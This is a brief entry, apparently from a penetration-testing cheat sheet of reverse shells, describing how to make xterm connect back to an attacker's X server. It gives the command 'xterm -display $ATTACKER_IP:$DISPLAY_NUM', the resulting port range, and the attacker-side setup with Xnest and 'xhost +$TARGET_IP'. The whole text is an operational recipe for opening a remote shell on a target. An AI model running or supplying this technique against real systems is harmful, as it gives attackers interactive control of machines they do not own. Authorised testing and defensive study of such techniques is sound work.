Adapted from slyth11907 / Cheatsheets / Cheatsheet_ReverseShells.
Remember that the X11 protocol is network based! You can thus get xterm to act as a reverse shell by simply providing it with a display pointing to your machine.
xterm -display $ATTACKER_IP:$DISPLAY_NUMThe connection will be made back on port 6000 + $DISPLAY_NUM (so, 6000 for display 0, 6001 for display 1, etc.).
This, of course, requires a running X server on your end (for example, Xnest :1). You’ll need to make sure that connections from the target system are authorized.
xhost +$TARGET_IP